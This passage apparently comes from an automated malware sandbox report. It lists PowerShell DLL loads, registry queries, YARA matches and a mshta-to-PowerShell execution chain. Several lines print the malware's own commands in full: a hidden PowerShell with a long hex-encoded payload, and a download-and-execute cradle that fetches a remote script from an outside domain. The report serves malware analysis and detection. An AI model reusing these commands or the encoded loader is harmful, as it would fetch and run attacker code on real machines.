                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 6.2.powershell.exe.7590000.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 6.2.powershell.exe.6e70000.0.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$bytESTRInG = $ENC.$KFPPygMgLP1k8Q6dlweOupSSqCpkfoFRvU3qNhJ7UoZFcxhvUk6qVW3HARbKd0e3nWLlF3PmHTuWwjuB6i3MOMaxawv6WeSVm1ZTT9Ruabbj2NRbSFAaOQU699DWtX0FJupzRu6JgcZNJztD9XSm3blDcSPYvu
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
                    Source: Yara matchFile source: 6.2.powershell.exe.8220000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B386E pushad ; iretd 6_2_006B3878
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B3948 pushad ; iretd 6_2_006B3952
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B392B pushad ; iretd 6_2_006B392C
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B5900 push cs; ret 6_2_006B5910
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B3983 push esp; iretd 6_2_006B398A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B7201 push edi; retn 0042h6_2_006B7206
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B161D pushad ; retf 6_2_006B1621
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_006B57C0 push cs; ret 6_2_006B5910
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C35150 push esp; ret 6_2_06C35612
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C611BF push FFFFFFE8h; retf 6_2_06C611C1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C7DFAB push es; iretd 6_2_06C7DFE8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C79F31 push A406C54Ah; ret 6_2_06C79F3D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C7ED88 pushad ; retf 6_2_06C7ED95
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C92DE1 push es; retf 6_2_06C92E00
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C94218 push eax; ret 6_2_06C94219
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06C9FA20 push edx; retf 6_2_06C9F9CB
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E62BCD push es; iretd 6_2_06E62BD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E62C1D push es; retf 6_2_06E62C28
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E6ADBD push edx; retf 6_2_06E6ADC0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06E62D51 push es; iretd 6_2_06E62D54
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07319C8F push 3C0704F5h; ret 6_2_07319C95
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh8_2_0043D812
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00443469 push ebp; iretd 8_2_0044346C
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044366E push 9F00CD97h; ret 8_2_004436B1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h8_2_0043AE3E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004477A5 push ebp; iretd 8_2_004477AA
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
